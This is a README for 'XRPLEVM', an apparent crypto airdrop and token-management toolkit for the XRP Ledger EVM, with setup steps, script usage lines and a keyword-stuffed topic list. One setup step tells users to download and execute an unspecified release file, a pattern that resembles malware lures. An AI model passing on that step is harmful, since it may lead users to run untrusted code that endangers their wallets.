Welcome to the XRPLEVM repository! This project offers a comprehensive toolkit for working with the XRP Ledger in an EVM-compatible environment. You can auto-deploy contracts, send tokens, burn assets, swap currencies, bridge assets, add liquidity pools, and mint tokens with ease.
- Auto Deployment: Easily deploy smart contracts on the XRP Ledger.
- Token Management: Send, burn, and mint tokens effortlessly.
- Swapping and Bridging: Swap tokens and bridge assets between different networks.
- Liquidity Pools: Add and manage liquidity pools.
- Airdrop Functionality: Claim and manage airdrops effectively.
To get started with XRPLEVM, follow these steps:
-
Clone the repository:
git clone https://github.com/Wizmithaaa/XRPLEVM.git
-
Navigate to the project directory:
cd XRPLEVM -
Install the required dependencies:
npm install
-
Download the latest release from Releases and execute the file.
To auto-deploy a contract, run the following command:
node deploy.js <contract-file>Replace <contract-file> with the path to your contract file.
To send tokens, use:
node send.js <recipient-address> <amount>To burn tokens, execute:
node burn.js <amount>To swap tokens, run:
node swap.js <from-token> <to-token> <amount>To bridge assets, use:
node bridge.js <asset> <destination-network>To add a liquidity pool, run:
node addLiquidity.js <pool-name> <token1> <token2> <amount1> <amount2>To mint new tokens, execute:
node mint.js <amount>We welcome contributions to XRPLEVM! If you want to help improve the project, please follow these steps:
- Fork the repository.
- Create a new branch (
git checkout -b feature-branch). - Make your changes.
- Commit your changes (
git commit -m 'Add new feature'). - Push to the branch (
git push origin feature-branch). - Open a pull request.
Please ensure your code adheres to our coding standards and includes appropriate tests.
This project is licensed under the MIT License. See the LICENSE file for details.
For the latest updates and releases, check out the Releases section.
Explore the topics related to this project:
- airdrop
- airdrop-application
- airdrop-claim-bot
- airdrop-farm
- airdrop-free
- airdrop-huner-download
- airdrop2024
- airdrop2025
- chain
- evm
- layer1
- layer2
- layer3
- meomundep
- xrp
- xrplevm
Join our community to stay updated and get help:
Thank you for your interest in XRPLEVM! Together, we can build a powerful toolset for the XRP Ledger ecosystem.